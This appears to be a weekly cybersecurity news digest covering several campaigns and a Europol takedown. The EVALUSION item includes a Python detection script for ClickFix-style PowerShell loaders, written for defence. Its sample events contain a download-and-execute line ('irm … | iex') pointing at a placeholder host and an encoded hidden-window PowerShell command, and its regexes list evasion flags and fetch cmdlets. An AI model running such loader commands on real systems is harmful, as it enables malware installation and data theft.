Weekly Summary Cyberattacks November 13-19
Researchers Detail Tuoni C2's Role in an Attempted 2025 Real Estate Cyber Intrusion
A cyberattack attempt against a major U.S. real estate company was analyzed after being blocked during its early stages. The operation, which occurred in mid-October 2025, involved the Tuoni C2 framework, a free and modular command-and-control tool originally intended for penetration testing and red-team operations but increasingly observed in malicious activity. While Tuoni itself is a traditional C2 platform, the delivery chain used in this incident was notably advanced, incorporating AI-assisted scripting, steganography, and in-memory execution.
Analysis of UNC1549 TTPs, Custom Tools, and Malware Targeting the Aerospace and Defense Ecosystem
Researchers reported new insights into ongoing espionage campaigns attributed to the Iranian-linked threat group UNC1549, which since mid-2024 has intensified operations against aerospace, aviation, and defense organizations. The group relies on a dual initial-access strategy, combining highly targeted spear-phishing with compromises of third-party suppliers whose network privileges provide covert pathways into well-defended environments. Its phishing campaigns evolve over time, beginning with job-related lures to compromise general users and later pivoting to tailored password-reset spoofing aimed at IT administrators.
EVALUSION Campaign Delivers Amatera Stealer and NetSupport RAT
Threat actors are abusing the ClickFix initial access vector in a campaign referred to as EVALUSION to deploy Amatera Stealer and NetSupport RAT. Amatera is a rebranded version of ACR (AcridRain) Stealer, originally developed and sold by the actor SheldIO until its source code was sold in mid-2024. The malware provides extensive data theft capabilities, harvesting credentials, payment information, and files from browsers, 149+ crypto-wallet extensions, desktop wallets, 43+ password managers, FTP/email/VPN clients, and other applications. The infection chain begins with victims being socially engineered into executing commands via the Windows Run prompt, which launches multi-stage PowerShell loaders.
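The Run-prompt-to-PowerShell chain described above leaves a recognisable parent/child pattern in process-creation telemetry. The following hunt is an added example written for this summary, not code from the EVALUSION report or its authors; the events are constructed in a Sysmon Event ID 1-like shape, and the flag and cmdlet lists are assumptions about what a ClickFix loader typically passes, not indicators taken from the campaign.

```python
import re

# Constructed process-creation events (Sysmon EID 1 shape); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -nop -ep bypass -enc QQBCAEMA"},  # placeholder base64
    {"parent": r"C:\Windows\explorer.exe", "user": r"CORP\asmith",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -NoProfile -Command "irm https://example.invalid/x | iex"'},
    {"parent": r"C:\Program Files\Vendor\updater.exe", "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -File C:\ProgramData\Vendor\check.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
]

# Assumed evasion switches seen in Run-prompt loaders: hidden window, encoded command,
# no profile, execution-policy bypass (long and short spellings).
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s+\S+"
    r"|nop(?:rofile)?\b|ep\s+bypass|executionpolicy\s+bypass)")
# Assumed download-and-run cmdlets/aliases that mark a multi-stage loader.
REMOTE_FETCH = re.compile(
    r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|iex|invoke-expression)\b")


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def clickfix_reasons(event):
    """Return why an event looks like a Run-prompt ClickFix launch (empty list = benign)."""
    reasons = []
    if basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return reasons
    # The Win+R Run prompt launches its child directly under explorer.exe; so do
    # double-clicked shortcuts, so this alone is not enough to alert on.
    if basename(event["parent"]) != "explorer.exe":
        return reasons
    reasons.append("powershell spawned directly by explorer.exe (Run prompt / shell)")
    if SUSPICIOUS_FLAGS.search(event["cmd"]):
        reasons.append("stealth or evasion switches on the command line")
    if REMOTE_FETCH.search(event["cmd"]):
        reasons.append("remote fetch or in-memory execution cmdlet")
    return reasons


def hunt(events):
    """Alert only when the explorer.exe parent is corroborated by at least one more reason."""
    return [(e["user"], clickfix_reasons(e)) for e in events if len(clickfix_reasons(e)) > 1]
```

Against the constructed events, the two explorer.exe-launched loaders are returned and the vendor-scheduled script and the notepad launch are not.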
Police Disrupt Rhadamanthys, VenomRAT, and Elysium Malware Operations
Law enforcement authorities from nine countries dismantled more than 1,000 servers that supported the Rhadamanthys infostealer, the VenomRAT remote-access trojan, and the Elysium botnet as part of the latest phase of Operation Endgame, an international effort coordinated by Europol and Eurojust. The coordinated action, conducted between 10 and 13 November 2025, included searches at 11 locations across Germany, Greece, and the Netherlands, the seizure of 20 domains, and the takedown or disruption of 1,025 servers tied to these malware operations. A key suspect linked to VenomRAT was arrested in Greece on November 3, 2025. Europol reported that the dismantled infrastructure had infected hundreds of thousands of computers globally, enabling the theft of several million credentials. The main suspect behind the Rhadamanthys infostealer allegedly had access to over 100,000 compromised cryptocurrency wallets, potentially worth millions of euros. Many victims were unaware their systems were infected. Authorities encouraged the public to check for potential compromise through politie.nl/checkyourhack and haveibeenpwned.com. This phase of Operation Endgame was supported by more than 30 private-sector partners, including Cryptolaemus, Shadowserver, Spycloud, Cymru, Proofpoint, CrowdStrike, Lumen, Abuse.ch, HaveIBeenPwned, Spamhaus, DIVD, Trellix, and Bitdefender. A command post at Europol’s headquarters coordinated intelligence sharing, crypto-tracing, forensic support, and operational actions with officers from Australia, Canada, Denmark, France, Germany, Greece, the Netherlands, and the United States. The announcement also confirms earlier reports that the Rhadamanthys Malware-as-a-Service operation had been disrupted, with its customers losing access to servers after suspected law-enforcement intervention. According to communications from the Rhadamanthys developer, German IP addresses were seen accessing web panels hosted in EU data centers shortly before the disruption. 
Operation Endgame has been responsible for multiple recent disruptions against cybercrime infrastructure, previously targeting IcedID, Bumblebee, Pikabot, Trickbot, SystemBC, DanaBot, Smokeloader, and related criminal services. In addition to infrastructure seizures, police contacted criminal service users and exposed failing criminal platforms via the Operation Endgame website. Europol emphasized that despite these coordinated actions, further investigative and operational phases are expected.
The COM: Anatomy of an English-Speaking Cybercriminal Ecosystem And The Origins of Scattered Lapsus$ Hunters
New research provides a comprehensive analysis of "The COM," an evolving English-speaking cybercriminal ecosystem that over the past decade has transformed from a niche community trading social media usernames into a global, service-based cybercrime economy driving large-scale data breaches, extortion, SIM swapping, ransomware incidents, cryptocurrency theft, and corporate intrusions. Rooted in mid-2010s forums such as Dark0de, RaidForums, and OGUsers, The COM now fuels some of the most disruptive, financially motivated, and reputation-driven threat operations. Its evolution shows how early identity traders and social engineers merged with technically skilled hackers, creating hybrid actors that blend manipulation, technical compromise, and public spectacle.